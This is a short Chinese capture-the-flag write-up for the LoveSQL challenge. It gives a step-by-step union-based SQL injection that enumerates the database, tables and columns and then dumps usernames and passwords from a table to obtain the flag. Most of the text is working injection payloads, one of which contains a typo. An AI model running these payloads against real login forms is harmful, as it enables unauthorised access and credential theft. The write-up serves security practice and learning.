[极客大挑战 2019]LoveSQL
访问靶机,还是老样子的界面:
明确可以注入,尝试一下联合查询:' union select 1,2,3#
- 有两个回显点
查看下本机数据库名:' union select 1,2,databse()#
查表:' UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() #
查看下表l0ve1ysq1
里面的列名:' UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='l0ve1ysq1'#
最后就可以查看这三个字段里面的内容了:' UNION SELECT id,GROUP_CONCAT(username),GROUP_CONCAT(password) FROM l0ve1ysq1#
- Flag就出来了